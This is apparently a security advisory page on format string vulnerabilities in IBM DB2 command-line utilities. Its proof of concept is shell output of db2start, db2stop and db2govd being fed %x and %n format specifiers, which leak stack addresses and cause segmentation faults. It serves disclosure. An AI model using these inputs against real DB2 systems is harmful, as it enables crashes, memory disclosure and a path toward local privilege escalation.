|
|
IBM DB2 Multiple Command-line Format String Vulnerabilities
The following proof of concept has been supplied: [kf@RiotStarter adm]$ ./db2start %x SQL2032N The "bffff270" parameter is not valid. [kf@RiotStarter adm]$ ./db2start %n%n Segmentation fault [kf@RiotStarter adm]$ ./db2stop %x SQL2032N The "bffff6f0" parameter is not valid. [kf@RiotStarter adm]$ ./db2stop %n%n Segmentation fault [db2inst1@RiotStarter adm]$ ./db2govd validate garbage %x GOV1023N Unable to open configuration file "bfffed88". RC = "-2045837302". [db2inst1@RiotStarter adm]$ ./db2govd validate garbage %n%n%n Segmentation fault [db2inst1@RiotStarter adm]$ ./db2govd stop a %x db2govd: GOV1005N No governor for database "A" on node "bfffe188" is running, or it is already being stopped. [db2inst1@RiotStarter adm]$ ./db2govd stop a %n%n%n Segmentation fault [db2inst1@RiotStarter adm]$ ./db2govd stop %x b db2govd: GOV1005N No governor for database "BFFFD788" on node "b" is running, or it is already being stopped. [db2inst1@RiotStarter adm]$ ./db2govd stop %n%n%n b Segmentation fault |
|
Privacy Statement |